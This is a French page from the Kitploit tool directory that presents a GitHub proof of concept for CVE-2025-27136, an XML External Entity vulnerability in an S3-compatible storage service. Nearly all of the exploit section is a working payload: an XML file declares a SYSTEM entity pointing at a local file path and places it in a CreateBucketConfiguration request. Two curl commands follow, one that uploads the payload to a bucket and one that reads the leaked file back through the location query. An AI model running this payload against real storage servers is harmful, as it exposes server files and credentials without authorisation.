Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-27136 — PoC d'entité externe XML dans un S3. | Kitploit
Outils/GitHubGitHub/issaboudin/cve-2025-27136
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionSécurité Cloud
GitHubissaboudin/cve-2025-27136

CVE-2025-27136

PoC d'entité externe XML dans un S3.

Voir le dépôt
13il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-27136

Exploitation d'une vulnérabilité XML External Entity (XXE).

Utiliser une charge utile XML pour récupérer des fichiers sensibles (PoC)

test.xml

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///path/to/file">
]>
<CreateBucketConfiguration>
  <LocationConstraint>&xxe;</LocationConstraint>
</CreateBucketConfiguration>

Utilisez curl pour envoyer test.xml depuis notre machine locale vers le bucket.

root@kitploit:~
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml

Déclenchez l'exploit et récupérez le fichier

root@kitploit:~
curl http://127.0.0.1:PORT/TB1?location
Télécharger l’outil